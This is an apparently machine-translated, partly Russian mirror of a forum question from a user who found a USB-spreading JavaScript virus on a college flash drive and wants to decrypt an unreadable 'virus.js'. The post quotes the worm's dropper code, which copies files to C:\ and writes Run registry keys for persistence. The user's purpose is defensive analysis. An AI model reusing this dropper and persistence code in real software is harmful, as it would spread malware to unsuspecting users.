Как расшифровать зашифрованный файл вируса JavaScript? [закрыто] ⇐ Javascript

[Anonymous]

Я обнаружил вирус на флэш -накопителе колледжа, который создает «документы» . При открытии он запускает браузер и выполняет следующий скрипт: < /p>

Код: Выделить всё

var FSO = WScript.CreateObject("Scripting.FIleSystemObject");
var WshShell = WScript.CreateObject("Wscript.Shell");
var pt1 = FSO.GetDriveName(WshShell.CurrentDirectory); // Flash drive name
// Open Documents folder and copy the virus to C:
WshShell.Run(pt1 + "\\Document");
FSO.CopyFolder(pt1 + "\\Document\\SystemPC", "C:\\");
// Write to registry for persistence
WshShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\prog", "C:\\SystemPC\\prog.js", "REG_SZ");
WshShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\onFlash", "C:\\SystemPC\\onFlash.js", "REG_SZ");
// Execute the scripts
WshShell.Run("C:\\SystemPC\\onFlash.js");
WshShell.Run("C:\\SystemPC\\prog.js");
< /code>
Удивительно, но ничего не случилось с моим компьютером. Запуск ATTRIB -H -R -S /S /D G:*< /code> в CMD выявил папку [b] SystemPC < /strong>, содержащая: < /p>
[list]
[*]OnFlash.js

[*]

Код: Выделить всё

onPC.js

[*]

Код: Выделить всё

prog.js

[*]

Код: Выделить всё

unp40590149.tmp

[*]

Код: Выделить всё

virus.js

(двоичный, нечитаемый)
[/list]
Мне нужно проанализировать virus.js , но я не могу прочитать его, используя блокнот ++, разные кодировки , или hxd
scenshot:

Как я могу расшифровать или проанализировать этот файл? p>
What I Tried:[/b]

• Opened in Notepad++ (various encodings) → unreadable
• Opened in HxD (hex editor) → binary format
• Unable to extract using 7zip

Is there a way to decrypt or analyze this encrypted JavaScript file?

Подробнее здесь: https://stackoverflow.com/questions/794 ... virus-file